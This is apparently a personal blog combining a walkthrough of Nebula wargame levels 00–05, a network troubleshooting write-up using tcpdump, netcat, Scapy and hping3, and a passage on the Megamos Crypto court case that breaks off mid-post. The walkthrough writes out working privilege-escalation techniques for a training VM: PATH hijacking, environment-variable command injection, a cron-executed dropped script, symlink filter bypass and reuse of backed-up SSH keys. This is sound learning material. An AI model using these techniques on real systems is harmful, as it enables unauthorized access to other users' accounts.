Nebula exploit exercises walkthrough – level05

Check the flag05 home directory. You are looking for weak directory permissions

Let’s start looking in /home/flag05:

level05@nebula:/home/flag05$ ls -asl
total 9
0 drwxr-x--- 1 flag05 level05   80 2014-06-03 04:19 .
0 drwxr-xr-x 1 root   root     420 2012-08-27 07:18 ..
0 drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .backup
4 -rw------- 1 flag05 flag05    13 2014-06-03 04:19 .bash_history
1 -rw-r--r-- 1 flag05 flag05   220 2011-05-18 02:54 .bash_logout
4 -rw-r--r-- 1 flag05 flag05  3353 2011-05-18 02:54 .bashrc
0 drwx------ 2 flag05 flag05    60 2014-06-03 04:17 .cache
1 -rw-r--r-- 1 flag05 flag05   675 2011-05-18 02:54 .profile
0 drwx------ 2 flag05 flag05    70 2011-11-20 20:13 .ssh

Compare to the home directory of level05:

level05@nebula:/home/flag05$ ls -asl /home/level05
total 9
0 drwxr-x--- 1 level05 level05  100 2014-06-04 21:55 .
0 drwxr-xr-x 1 root    root     420 2012-08-27 07:18 ..
4 -rw------- 1 level05 level05  298 2014-06-03 04:19 .bash_history
1 -rw-r--r-- 1 level05 level05  220 2011-05-18 02:54 .bash_logout
4 -rw-r--r-- 1 level05 level05 3353 2011-05-18 02:54 .bashrc
0 drwx------ 2 level05 level05   60 2014-06-03 04:15 .cache
1 -rw-r--r-- 1 level05 level05  675 2011-05-18 02:54 .profile

So we have .ssh – the store of SSH keys for the user – and .backup. The .ssh directory is locked down so we can’t see it.

Let’s look in .backup:

level05@nebula:/home/flag05/.backup$ ls -asl
total 2
0 drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .
0 drwxr-x--- 1 flag05 level05   80 2014-06-03 04:19 ..
2 -rw-rw-r-- 1 flag05 flag05  1826 2011-11-20 20:13 backup-19072011.tgz

A single backup .tgz. Let’s copy it out to our own home directory and unpack.

level05@nebula:~$ cp /home/flag05/.backup/backup-19072011.tgz ./
level05@nebula:~$ tar zxvf backup-19072011.tgz 
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys

That’s the private (id_rsa) and public (id_rsa.pub) keys for flag05. They may well work on the local machine:

level05@nebula:~$ ssh flag05@localhost
flag05@nebula:~$ getflag
You have successfully executed getflag on a target account

Simple. That’s why you should keep your private key private!

Nebula exploit exercises walkthrough – level04

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it 🙂

#include 
#include 
#include 
#include 
#include 
#include 

int main(int argc, char **argv, char **envp)
{
  char buf[1024];
  int fd, rc;

  if(argc == 1) {
    printf("%s [file to read]\n", argv[0]);
    exit(EXIT_FAILURE);
  }

  if(strstr(argv[1], "token") != NULL) {
    printf("You may not access '%s'\n", argv[1]);
    exit(EXIT_FAILURE);
  }

  fd = open(argv[1], O_RDONLY);
  if(fd == -1) {
    err(EXIT_FAILURE, "Unable to open %s", argv[1]);
  }

  rc = read(fd, buf, sizeof(buf));
  
  if(rc == -1) {
    err(EXIT_FAILURE, "Unable to read fd %d", fd);
  }

  write(1, buf, rc);
}

This program looks like it will read the file passed to it by the first argument. Let’s test that out:

level04@nebula:/home/flag04$ ./flag04 
./flag04 [file to read]
level04@nebula:/home/flag04$ ./flag04 /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh

Everything as expected then. The problem is that it explicitly forbids opening of files called token. How can we get round this?

Symbolic links to the rescue again!

level04@nebula:~$ ln -s /home/flag04/token Token
level04@nebula:~$ /home/flag04/flag04 /home/level04/Token
06508b5e-8909-4f38-b630-fdb148a848a2

Just create a symbolic link to a name that doesn’t match “token”.

So what is this long string? Seems sensible to try and login to the flag04 account with it:

flag04@nebula:~$ getflag
You have successfully executed getflag on a target account

Nebula exploit exercises walkthrough – level03

level03

Check the home directory of flag03 and take note of the files there.

There is a crontab that is called every couple of minutes.

cron is a utility used to run tasks periodically, found in nearly every distro.

In /home/flag03, we have a script – writable.sh – and a directory – writable.d.

level03@nebula:/home/flag03$ ls -sl
total 1
0 drwxrwxrwx 1 flag03 flag03 40 2014-06-03 03:39 writable.d
1 -rwxr-xr-x 1 flag03 flag03 98 2011-11-20 21:22 writable.sh

Let’s take a look at writable.sh:

#!/bin/sh

for i in /home/flag03/writable.d/* ; do
	(ulimit -t 5; bash -x "$i")
	rm -f "$i"
done

This is fairly simple – for each file in the writable.d directory, execute the scripts contained within, and then delete them. bash -x runs the script in a trace mode, to give you a bit more detail about when it is running. I think we can ignore ulimit -t 5 – it just limits the CPU time available to the shell, possibly to stop a malicious script consuming excess resources.

Note that the writable.d directory is world read/write – so we can just put a script in there:

level03@nebula:~$ cat getflag.sh 
#!/bin/sh

/bin/getflag >> /tmp/flag03.out
level03@nebula:~$ cp getflag.sh /home/flag03/writable.d/

Then wait a short while, assuming that the writable.sh script is the one being run by cron…

level03@nebula:/tmp$ ls -sl
total 4
4 -rw-rw-r-- 1 flag03 flag03 59 2014-06-04 09:39 flag03.out
level03@nebula:/tmp$ cat flag03.out 
You have successfully executed getflag on a target account

Aside

Now – this is all well and good, but if we weren’t told that the script was run by cron, what could we do?

There is a root user in the Nebula VM, and using that I can do:

nebula@nebula:/var/spool/cron$ sudo crontab -u flag03 -l
*/3 * * * * /home/flag03/writable.sh

But I can’t do that as level03:

level03@nebula:/tmp$ crontab -u flag03 -l
must be privileged to use -u

Also, I could use ps to see that the process runs, but that would presume that I knew it was cron’ed anyway.

So, not sure how I would go about finding cron jobs as an unprivileged user.

I’ve asked on the Unix Stack Exchange.

Nebula exploit exercises walkthrough – level02

level02

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

include 
include 
include 
include 
include 

int main(int argc, char **argv, char **envp)
{
  char *buffer;

  gid_t gid;
  uid_t uid;

  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  buffer = NULL;

  asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
  printf("about to call system(\"%s\")\n", buffer);
  
  system(buffer);
}

Another executable that calls system(). This time the command run is built up using an environment variable, USER.

Running the executable gives the expected result:

level02@nebula:/home/flag02$ ls -asl 
total 13
0 drwxr-x--- 2 flag02 level02   80 2011-11-20 21:22 .
0 drwxr-xr-x 1 root   root     400 2012-08-27 07:18 ..
1 -rw-r--r-- 1 flag02 flag02   220 2011-05-18 02:54 .bash_logout
4 -rw-r--r-- 1 flag02 flag02  3353 2011-05-18 02:54 .bashrc
8 -rwsr-x--- 1 flag02 level02 7438 2011-11-20 21:22 flag02
1 -rw-r--r-- 1 flag02 flag02   675 2011-05-18 02:54 .profile
level02@nebula:/home/flag02$ echo $USER
level02
level02@nebula:/home/flag02$ ./flag02 
about to call system("/bin/echo level02 is cool")
level02 is cool
level02@nebula:/home/flag02$ 

The executable is suid. Notice that although it calls system() and sets the setresgid()/setresuid() so that it runs as the owner of the file, the environment variable USER is still for the real UID, level02.

It’s really easy to change environment variables though.

level02@nebula:/home/flag02$ export USER=";getflag;"
level02@nebula:/home/flag02$ echo $USER
;getflag;
level02@nebula:/home/flag02$ ./flag02 
about to call system("/bin/echo ;getflag; is cool")

You have successfully executed getflag on a target account
sh: is: command not found
level02@nebula:/home/flag02$ 

This is a good reason to not trust environment variables for security purposes.

Aside

I didn’t fully understand why setresgid()/setresuid() had to be called for system() to run as the file owner. I built the same executable from source to experiment, set the owner, group and permissions as needed, but it didn’t work!

I spent a fair amount of time trying to figure this out, and it wasn’t until I did:

level02@nebula:/home/flag02$ cat /etc/fstab
overlayfs / overlayfs rw 0 0
tmpfs /tmp tmpfs nosuid,nodev 0 0

I was trying to run them out of /tmp/ and the whole directory doesn’t allow suid use…

Nebula exploit exercises walkthrough – level01

level01

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

#include 
#include 
#include 
#include 
#include 
 
int main(int argc, char **argv, char **envp)
{
	gid_t gid;
	uid_t uid;
	gid = getegid();
	uid = geteuid();

	setresgid(gid, gid, gid);
	setresuid(uid, uid, uid);

	system("/usr/bin/env echo and now what?");
}

The executable is located in the /home/flag01 directory. On running it, we get the expected output:

level01@nebula:/home/flag01$ ./flag01
and now what?

Importantly, if we check the permissions on the executable:

level01@nebula:/home/flag01$ ls -asl
total 13
0 drwxr-x--- 1 flag01 level01   40 2014-06-03 22:33 .
0 drwxr-xr-x 1 root   root     380 2012-08-27 07:18 ..
1 -rw-r--r-- 1 flag01 flag01   220 2011-05-18 02:54 .bash_logout
4 -rw-r--r-- 1 flag01 flag01  3353 2011-05-18 02:54 .bashrc
8 -rwsr-x--- 1 flag01 level01 7322 2011-11-20 21:22 flag01
1 -rw-r--r-- 1 flag01 flag01   675 2011-05-18 02:54 .profile

We can see that this file also has the suid bit set. The problem then is, how do we get this to run “getflag”?

The executable does nothing with command line parameters so we can’t pass anything in there. It does however call echo to output the text. echo is a built-in command to bash (i.e. not a discrete executable like ping would be), so we normally couldn’t override what it does.

However notice that the system call uses /user/bin/env before echo – where is this normally seen? At the start of scripts where we define the interpreter with a shebang.

#!/usr/bin/env python

The reason that /usr/bin/env is used is that scripts need a full path to the interpreter. python could be anywhere, and it is awkward to modify scripts to use a full path from system to system. /usr/bin/env searches the path for the command passed to it and runs it.

This means we can provide our own echo, modify the path so that this echo is called in preference to the built-in, and then we can run arbitrary commands.

The easiest way to provide our own echo that runs getflag is to just create a symbolic link.

level01@nebula:~$ ln -s /bin/getflag echo
level01@nebula:~$ ls -asl
total 5
0 drwxr-x--- 1 level01 level01   80 2014-06-03 22:41 .
0 drwxr-xr-x 1 root    root     380 2012-08-27 07:18 ..
1 -rw-r--r-- 1 level01 level01  220 2011-05-18 02:54 .bash_logout
4 -rw-r--r-- 1 level01 level01 3353 2011-05-18 02:54 .bashrc
0 drwx------ 2 level01 level01   60 2014-06-03 18:22 .cache
0 lrwxrwxrwx 1 level01 level01   12 2014-06-03 22:41 echo -> /bin/getflag
1 -rw-r--r-- 1 level01 level01  675 2011-05-18 02:54 .profile
level01@nebula:~$ export PATH=.:$PATH
level01@nebula:~$ /home/flag01/flag01 
You have successfully executed getflag on a target account

Again – relatively simple. Symbolic links are useful tools for bypassing name and location checks!

Nebula exploit exercises walkthrough – level00

I’ve felt for a long time that whilst I understand a lot of vulnerabilities and exploits, I don’t have enough knowledge to actually build exploits myself. Reading is all well and good, but doing is better, especially when it comes to development.

To make learning easier, there are several virtual machine images you can download which have a series of challenges, getting progressively harder. The one I chose to do is called Nebula from exploit-exercises.com – it was recommended on several forums.

Getting up and running is very easy – download the ISO and run it from any virtualisation software. I’m using Parallels on Mac OS X.

I’m going to go through each level one by one!

level00

This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking directories.

Alternatively, look at the find man page.

I always prefer the lazy, more reliable method i.e. using find.

We need to find an executable that is owned by flag00 and has the suid bit set. If suid is set, the executable will run as the owner of the file, rather than the person running it.

The command here is simple:

level00@nebula:~$ find / -perm /u=s -user flag00 2>/dev/null
/bin/.../flag00
/rofs/bin/.../flag00

The directory name of has been used to try to hide the file.

level00@nebula:~$ ls -asl /bin/.../
total 8
0 drwxr-xr-x 2 root   root      29 2011-11-20 21:22 .
0 drwxr-xr-x 3 root   root    2728 2012-08-18 02:50 ..
8 -rwsr-x--- 1 flag00 level00 7358 2011-11-20 21:22 flag00

As you can see this is owned by flag00 and instead of just being executable (-rwx-r-x—) it is suid (-rws-r-x—).

Run this file and you end up in a flag00 shell:

level00@nebula:~$ /bin/.../flag00 
Congrats, now run getflag to get your flag!
flag00@nebula:~$ getflag
You have successfully executed getflag on a target account

Investigating a tricky network problem with Python, Scapy and other network tools

We’ve had a fairly long-term issue at work with connectivity to one of our application servers. Every now and then you can’t login or connect and it has seemed fairly random. This finally annoyed myself and a customer enough that I had to look into it.

The connection is made to the server on port 1494 – Citrix ICA. Initially we suspected that the .ica file downloaded and opened by the Citrix Receiver software was incorrect or corrupt, but inspection and testing of this showed that it was OK. It really did look like the connection was just being randomly rejected.

It seemed that myself and a single customer were having far more frequent issues that other users. Of course it could just be my tolerance for whinging is lower than my colleagues.

Note that nearly all of the below was done on OS X – syntax of some of these commands differs under Linux and Windows. I have changed the host IP for security reasons.

telnet

Most applications that listen on a TCP port will respond to telnet, even if they don’t send anything back. Telnet is almost raw TCP – it has some control and escape sequences layered on top, but it is very simple at a protocol level.

ICA responds when connecting by sending back “ICA” every 5s:

andrew@andrews-mbp:/$ telnet 212.120.12.189 1494
Trying 212.120.12.189...
Connected to 212.120.12.189.
Escape character is '^]'.
ICAICA^]
telnet> quit
Connection closed.

But every now and then I was getting nothing back:

andrew@andrews-mbp:/$ telnet 212.120.12.189 1494
Trying 212.120.12.189...
telnet: connect to address 212.120.12.189: Operation timed out
telnet: Unable to connect to remote host

Oddly, whenever the Citrix Receiver failed to launch, I wasn’t always having problems with telnet, and vice versa. This is good – we’ve replicated the issue with a very simple utility using raw TCP rather than having to look into the intricate details of Citrix and whatever protocol it uses.

tcpdump

So let’s fire up tcpdump to see what happens when the connection is working. tcpdump is a command line packet analyser. It’s not as versatile or as easy to use as Wireshark, but it is quick and easy. You can use tcpdump to generate a .pcap file which can then be opened in Wireshark at a later date – this is good for when you are working on systems with no UI.

I filtered the tcpdump output to only show traffic where one of the two IPs was the server.

andrew@andrews-mbp:/$ sudo tcpdump -i en0 host 212.120.12.189
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on en0, link-type EN10MB (Ethernet), capture size 65535 bytes
23:16:40.027018 IP andrews-mbp.49425 > 212.120.12.189.ica: Flags [S], seq 2598665487, win 65535, options [mss 1460,nop,wscale 4,nop,nop,TS val 1027031986 ecr 0,sackOK,eol], length 0
23:16:40.080030 IP 212.120.12.189.ica > andrews-mbp.49425: Flags [S.], seq 3949093716, ack 2598665488, win 8192, options [mss 1400,nop,wscale 8,sackOK,TS val 188590479 ecr 1027031986], length 0
23:16:40.080173 IP andrews-mbp.49425 > 212.120.12.189.ica: Flags [.], ack 1, win 8241, options [nop,nop,TS val 1027032039 ecr 188590479], length 0
23:16:40.321664 IP 212.120.12.189.ica > andrews-mbp.49425: Flags [P.], seq 1:7, ack 1, win 260, options [nop,nop,TS val 188590504 ecr 1027032039], length 6
23:16:40.321739 IP andrews-mbp.49425 > 212.120.12.189.ica: Flags [.], ack 7, win 8240, options [nop,nop,TS val 1027032280 ecr 188590504], length 0
23:16:42.389928 IP andrews-mbp.49425 > 212.120.12.189.ica: Flags [F.], seq 1, ack 7, win 8240, options [nop,nop,TS val 1027034342 ecr 188590504], length 0
23:16:42.794413 IP andrews-mbp.49425 > 212.120.12.189.ica: Flags [F.], seq 1, ack 7, win 8240, options [nop,nop,TS val 1027034746 ecr 188590504], length 0
23:16:42.796361 IP 212.120.12.189.ica > andrews-mbp.49425: Flags [.], ack 2, win 260, options [nop,nop,TS val 188590739 ecr 1027034342], length 0
23:16:42.796430 IP andrews-mbp.49425 > 212.120.12.189.ica: Flags [.], ack 7, win 8240, options [nop,nop,TS val 1027034748 ecr 188590739], length 0
23:16:43.055123 IP 212.120.12.189.ica > andrews-mbp.49425: Flags [.], ack 2, win 260, options [nop,nop,TS val 188590777 ecr 1027034342], length 0
23:16:45.591455 IP 212.120.12.189.ica > andrews-mbp.49425: Flags [R.], seq 7, ack 2, win 0, length 0

This all looks fairly normal – my laptop is sending a SYN to the server, which responds with SYN-ACK, and then I respond with an ACK. You can see this in the “Flags” part of the capture. S, S., . (. means ACK in tcpdump). Everything then progresses normally until I close the connection.

However, when the connection fails:

23:23:31.617966 IP andrews-mbp.49569 > 212.120.12.189.ica: Flags [S], seq 644234313, win 65535, options [mss 1460,nop,wscale 4,nop,nop,TS val 1027442033 ecr 0,sackOK,eol], length 0
23:23:32.812081 IP andrews-mbp.49569 > 212.120.12.189.ica: Flags [S], seq 644234313, win 65535, options [mss 1460,nop,wscale 4,nop,nop,TS val 1027443220 ecr 0,sackOK,eol], length 0
23:23:33.822268 IP andrews-mbp.49569 > 212.120.12.189.ica: Flags [S], seq 644234313, win 65535, options [mss 1460,nop,wscale 4,nop,nop,TS val 1027444226 ecr 0,sackOK,eol], length 0
23:23:34.830281 IP andrews-mbp.49569 > 212.120.12.189.ica: Flags [S], seq 644234313, win 65535, options [mss 1460,nop,wscale 4,nop,nop,TS val 1027445232 ecr 0,sackOK,eol], length 0
23:23:35.837841 IP andrews-mbp.49569 > 212.120.12.189.ica: Flags [S], seq 644234313, win 65535, options [mss 1460,nop,wscale 4,nop,nop,TS val 1027446234 ecr 0,sackOK,eol], length 0
23:23:36.846448 IP andrews-mbp.49569 > 212.120.12.189.ica: Flags [S], seq 644234313, win 65535, options [mss 1460,nop,wscale 4,nop,nop,TS val 1027447234 ecr 0,sackOK,eol], length 0
23:23:38.863758 IP andrews-mbp.49569 > 212.120.12.189.ica: Flags [S], seq 644234313, win 65535, options [mss 1460,nop,wscale 4,nop,nop,TS val 1027449238 ecr 0,sackOK,eol], length 0
23:23:42.913202 IP andrews-mbp.49569 > 212.120.12.189.ica: Flags [S], seq 644234313, win 65535, options [mss 1460,sackOK,eol], length 0
23:23:50.934613 IP andrews-mbp.49569 > 212.120.12.189.ica: Flags [S], seq 644234313, win 65535, options [mss 1460,sackOK,eol], length 0
23:24:07.023617 IP andrews-mbp.49569 > 212.120.12.189.ica: Flags [S], seq 644234313, win 65535, options [mss 1460,sackOK,eol], length 0
23:24:39.154686 IP andrews-mbp.49569 > 212.120.12.189.ica: Flags [S], seq 644234313, win 65535, options [mss 1460,sackOK,eol], length 0

I get nothing back at all – it’s just telnet trying the connection again and again by sending SYNs. I was expecting part of the connection to succeed, but this looked like the host just wasn’t responding at all. This might indicate a firewall or network issue rather than a problem with Citrix.

I used Wireshark on the server side to confirm that no traffic was getting through. I could see the successful connections progressing fine, but I could see nothing of the failing connections. I wanted to check both sides because there were a number of potential scenarios where a client could send a SYN and not get a SYN-ACK back:

  1. Client sends SYN, server never sees SYN.
  2. Client sends SYN, server sees SYN, server sends SYN-ACK back which is lost.
  3. Client send SYN, server sees SYN, choses not to respond.

It seemed that 1 was happening here.

So what was causing this? Sometimes it worked, sometimes it didn’t. Did it depend on what time I did it? Was there another variable involved?

mtr

Let’s check for outright packet loss. ping and traceroute are useful for diagnosing packet loss on a link, but it can be hard work working out which step is causing problems. Step in mtr, or my trace route. This provides a tabular, updating output which combines ping and traceroute with a lot of useful information.

                                      My traceroute  [v0.85]
andrews-mbp (0.0.0.0)                                                    Thu Dec  5 00:52:49 2013
Keys:  Help   Display mode   Restart statistics   Order of fields   quit
                                                         Packets               Pings
 Host                                                  Loss%   Snt   Last   Avg  Best  Wrst StDev
 1. router.asus.com                                     0.0%    36    1.8   4.6   1.2 104.0  17.0
 2. 10.182.43.1                                         0.0%    36   10.1  41.3   8.1 291.2  68.1
 3. haye-core-2a-ae6-642.network.virginmedia.net        0.0%    36    9.0  22.4   8.3 185.6  33.7
 4. brnt-bb-1c-ae9-0.network.virginmedia.net            0.0%    36   13.5  13.8   8.9  80.2  11.6
 5. brhm-bb-1c-et-700-0.network.virginmedia.net         0.0%    35   14.4  17.1  12.9  29.7   3.5
 6. brhm-core-2a-ae0-0.network.virginmedia.net          0.0%    35   17.3  16.0  13.0  23.5   2.3
 7. brhm-lam-2-tenge11.network.virginmedia.net          0.0%    35   14.5  15.3  12.5  21.1   2.0
 8. m949-mp4.cvx2-b.bir.dial.ntli.net                   0.0%    35   15.1  20.7  14.7 113.9  16.4
 9. 212.120.12.189                                      0.0%    35   20.5  19.7  16.3  34.0   2.9

I let this run for a while and observed virtually no packet loss. It’s important to note that it is using ICMP pings – not TCP as Citrix uses. ICMP messages can be dealt with differently to TCP. mtr does support TCP pings but I can’t get it to work under OS X.

Python and telnetlib

So wrote a small Python program using the telnetlib module to periodically connect to the port using telnet and indicate when there were problems. The output was simple graphical representation so that I could spot any timing patterns.

import telnetlib
import time
import socket

WAITTIME = 5
RHOST = '212.120.12.189'
RPORT = 1494
STATFREQ = 16

StatCounter = 0
FailCounter = 0

while True:
    time.sleep(WAITTIME)

    if StatCounter != 0 and StatCounter % STATFREQ == 0:
        print str(FailCounter) + ' / ' + str(StatCounter)

    StatCounter += 1

    Fail = False
    try:
        ica = telnetlib.Telnet(host=RHOST, port=RPORT, timeout=1)
    except socket.timeout:
        Fail = True
        FailCounter += 1

    if not Fail:
        ica.close()

    if Fail:
        print '*',
    else:
        print '.',

So this prints a . for a successful connection and * for unsuccessful. After every 16 packets, the number of failures/total is printed.

. . . * . . * . . . . * . . * . 4 / 16
. . . * . * . . . . * . . * . . 8 / 32
. . * . . * . . . . * . * . . . 12 / 48
. . . * * . . . . . . * * . . . 16 / 64
. . . . * . . . . . . * * . . . 19 / 80
. . . * * . . . . . . * * . . . 23 / 96
. . . * * . . . . . . * . * . . 27 / 112
. * . . * . . * . . . * . . . . 31 / 128
* . . * . . . * . . * . . . * . 36 / 144
* . . . . . . * * . . . . . . * 40 / 160
. . . . . . * * . . . . . . * . 43 / 176
. . . . . * * . . . . . . * . . 46 / 192
. . . . * * . . . . . . * . . . 49 / 208
* . . . . . . * * . . . . . . * 53 / 224
. . . . . . . * * . . . . . . * 56 / 240
* . . . . . . * * . . . . . . * 60 / 256

What can we note?

  • There is some vague pattern there, often repeating every 8 packets.
  • The rate of failed to successful connections is nearly always 25%.
  • Varying the WAITTIME (the time between connections) had some interesting effects. With short times, the patterns were regular. With longer times they seemed less regular.
  • Using the laptop for other things would disrupt the pattern but packet loss stayed at 25%. Even with very little other traffic the loss was 25%.

What varies over time, following a pattern, but would show behaviour like this?

The source port.

Every TCP connection not only has a destination port, but a source port – typically in the range of 1025 to 65535. The source port is incremented for each connection made. So the first time I telnet it would be 43523, the next time 45324, then 45325 and so on. Other applications share the same series of source ports and increment it as they make connections.

When I run the test program with a short wait time, there is very little chance for other applications to increment the source port. When I run it with a longer wait time (30s or so), many other applications will increment the source port, causing the pattern to be inconsistent.

It really looked like certain source ports were failing to get through to the server.

netcat

I had to test this theory. You can’t control the source port with telnet, but you can with the excellent netcat (or nc, as the command is named). “-p” controls the source port:

andrew@andrews-mbp:/$ nc -p 1025 212.120.12.189 1494
ICA^C
andrew@andrews-mbp:/$ nc -p 1026 212.120.12.189 1494
^C
andrew@andrews-mbp:/$ nc -p 1027 212.120.12.189 1494
ICA^C
andrew@andrews-mbp:/$ nc -p 1025 212.120.12.189 1494
ICA^C
andrew@andrews-mbp:/$ nc -p 1026 212.120.12.189 1494
^C
andrew@andrews-mbp:/$ nc -p 1027 212.120.12.189 1494
ICA^C

As you can see – connections from 1025 and 1027 always succeed and 1026 always fail. I tested many other ports as well. We have our culprit!

Python and Scapy

Now, can we spot a pastern with the ports that are failing and those that are succeeding? Maybe. I needed something to craft some TCP/IP packets to test this out. I could use netcat and a bash script, but I’ve recently learnt about Scapy, a packet manipulation module for Python. It’s incredibly flexible but also very quick and easy. I learnt about it after reading the book Violent Python, which I would recommend if you want to quickly get using Python for some real world security testing.

The script needs to connect to the same destination port from a range of source ports and record the results. With Scapy, half an hour later, I have this (note, I did have some issues with Scapy and OS X that I will need to go over in another post):

import time
from scapy.all import *

RHOST = '212.120.12.189'
RPORT = 80
LPORT_LOW = 1025
LPORT_HIGH = LPORT_LOW + 128

for port in range(LPORT_LOW, LPORT_HIGH):
    ip = IP(dst=RHOST)
    # TCP sets SYN flag by default
    tcp = TCP(dport=RPORT, sport=port)

    # Build packet by layering TCP/IP
    send_packet = ip/tcp

    # Send packet and wait for a single response - aggressive timeout to speed up tests
    recv_packet = sr1(send_packet, timeout=0.1, verbose=0)

    # Red for failed tests, normal for success
    if recv_packet is None:
        colour_start = '�33[0;31m'
    else:
        colour_start = '�33[1;0m'

    # Show source port in decimal, hex and binary to spot patterns
    print colour_start + str(port) + ':' + format(port, '#04x') + ':' + format(port, '016b')

    time.sleep(0.01)

This produced really helpful output. The failed packets are highlighted in the excerpt below:

1025:0x401:0000010000000001
1026:0x402:0000010000000010
1027:0x403:0000010000000011
1028:0x404:0000010000000100
1029:0x405:0000010000000101
1030:0x406:0000010000000110
1031:0x407:0000010000000111
1032:0x408:0000010000001000
1033:0x409:0000010000001001
1034:0x40a:0000010000001010
1035:0x40b:0000010000001011
1036:0x40c:0000010000001100
1037:0x40d:0000010000001101
1038:0x40e:0000010000001110
1039:0x40f:0000010000001111
1040:0x410:0000010000010000
1041:0x411:0000010000010001
1042:0x412:0000010000010010
1043:0x413:0000010000010011
1044:0x414:0000010000010100
1045:0x415:0000010000010101
1046:0x416:0000010000010110
1047:0x417:0000010000010111
1048:0x418:0000010000011000

At this point in the port range it appears that packets ending in 001 or 110 are failing.

1128:0x468:0000010001101000
1129:0x469:0000010001101001
1130:0x46a:0000010001101010
1131:0x46b:0000010001101011
1132:0x46c:0000010001101100
1133:0x46d:0000010001101101
1134:0x46e:0000010001101110
1135:0x46f:0000010001101111
1136:0x470:0000010001110000
1137:0x471:0000010001110001
1138:0x472:0000010001110010
1139:0x473:0000010001110011
1140:0x474:0000010001110100
1141:0x475:0000010001110101
1142:0x476:0000010001110110
1143:0x477:0000010001110111
1144:0x478:0000010001111000
1145:0x479:0000010001111001
1146:0x47a:0000010001111010
1147:0x47b:0000010001111011
1148:0x47c:0000010001111100
1149:0x47d:0000010001111101
1150:0x47e:0000010001111110
1151:0x47f:0000010001111111

Move further down the port range and packets ending 000 and 111 are failing.

In fact, at any given point it seems that the packets failing are either 000/111, 001/110, 010/101, 011/100 – complements of one another. Higher order bits seem to determine which pair is going to fail.

Curious!

What makes this even stranger is that changing the destination port (say, from 1494 to 80) gives you a different series of working/non-working source ports. 1025 works for 1494, but not 80. 1026 works for both. 1027 works only for 80.

All of my tests above have been done on my laptop over an internet connection. I wanted to test a local machine as well to narrow down the area the problem could be in – is it the perimeter firewall or the switch the server is connected to?

hping3

The local test machine is a Linux box which is missing Python but has hping3 on it. This is another useful tool that allows packets to be created with a great degree of flexibility. In many respects it feels like a combination of netcat and ping.

admin@NTPserver:~$ sudo hping3 10.168.40.189 -s 1025 -S -i u100000 -c 20 -p 1494

What does all this mean?

  • First parameter is the IP to connect to.
  • -s is the start of the source port range – hping3 will increment this by 1 each time unless -k is passed
  • -S means set the SYN flag (similar to the Scapy test above)
  • -i u100000 means wait 100000us between each ping
  • -c 20 means send 20 pings
  • -p 1494 is the offending port to connect to

And what do we get back?

--- 10.168.40.189 hping statistic ---
20 packets transmitted, 16 packets received, 20% packet loss
round-trip min/avg/max = 0.3/0.4/0.8 ms

The same sort of packet loss we were seeing before. Oddly, the source ports that work differ from this Linux box to my laptop.

Here’s where it gets even stranger. I then decided to try padding the SYN out with some data (which I think is valid for TCP, though I’ve never seen a real app do it and mtr’s man page says it isn’t). You use -d 1024 to append 1024 bytes of data. I first tried 1024 bytes and had 20% packet loss as before. They I tried 2048 bytes:

--- 10.168.40.189 hping statistic ---
20 packets transmitted, 20 packets received, 0% packet loss
round-trip min/avg/max = 0.5/0.6/0.9 ms

Wait? All the packets are now getting through?

Through a process of trial and error I found that anything with more than 1460 bytes of data was getting through fine. 1460 bytes of data + 20 bytes TCP header + 20 bytes IP header = 1500 bytes – this is the Ethernet MTU (Maximum Transmit Unit). Anything smaller than this can be sent in a single Ethernet frame, anthing bigger needs to be chopped up into multiple frames (although some Ethernet networks allow jumbo frames which are much bigger – this one doesn’t).

I then ran the hping3 test from my laptop and found that altering the data size had no impact on packet loss. I strongly suspect that this is because a router or firewall along the way is somehow modifying or reassembling the fragmented frames to inspect them, and then reassembling them in a different way.

At this point I installed the Broadcom Advanced Control Suite (BACS) on the server to see if I could see any further diagnostics or statistics to help. One thing quickly stood out – a counter labelled “Out of recv. buffer” was counting up almost in proportion to the number of SYN packets getting lost:

BACS

This doesn’t sound like a desirable thing. It turns out the driver is quite out of date – maybe I should have started here!

Conclusion

I’m still not sure what is going on here. The packets being rejected do seem to follow some kind of pattern, but it’s certainly not regular enough to blame it on the intentional behaviour of a firewall.

At this point we are going to try upgrading the drivers for the network card on the sever and see if this fixes the issue.

The point of all of the above is to show how quick and easy it can be to use easily available tools to investigate network issues.

Reverse engineering Megamos Crypto?

Some of you might have read the stories going around a few weeks ago – “Scientist banned from revealing codes used to start luxury cars“. The short of it is that a security researcher has had a injunction imposed on him, preventing him from publishing a paper. The paper reveals security problems in the Megamos Crypto system used in the immobiliser system of many cars. Volkswagen are not happy – it really seems they want this shut down.

(As an aside, I hate the way that mainstream media refers to “codes” – it can mean source code, executables, an algorithm, or even a secret key. Often used interchangeably in the same article)

Details were a little scant, but last night the EFF passed comment, based on the court’s decision.

I am not a lawyer – I’m not going to pass judgement on the legal side. But what is interesting is how the researchers got hold of the Megamos Crypto algorithm. It wasn’t by decapping the chips in the transponders, it wasn’t from observing them black-box, it wasn’t from looking at an embedded software implementation – they took a Windows program used to clone car key transponders and reverse engineered that.

In terms of working out how Megamos was implemented, someone else had already done the hard work. This left the researchers to perform detailed cryptanalysis of the algorithm and – rumour has it – find some serious problems.

The piece of software is called “Tango Programmer“, a third party tool (software and hardware) used to make transponders. This has been available since at least 2009.

Tango Programmer is readily available, but it appears that it needs to be bought alongside a physical programmer. I strongly suspect that the software would be available on file sharing sites illegally, or possibly even legitimately on another site if you look hard enough.

Another company, Bicotech, produce a similar tool called RwProg. The software is downloadable from their website. The executable is packed, but I am sure it would be perfectly possible to reverse engineer the algorithm from the binary.

The court decision itself contains valuable information on Megamos as well, notably from paragraphs 4 and 5:

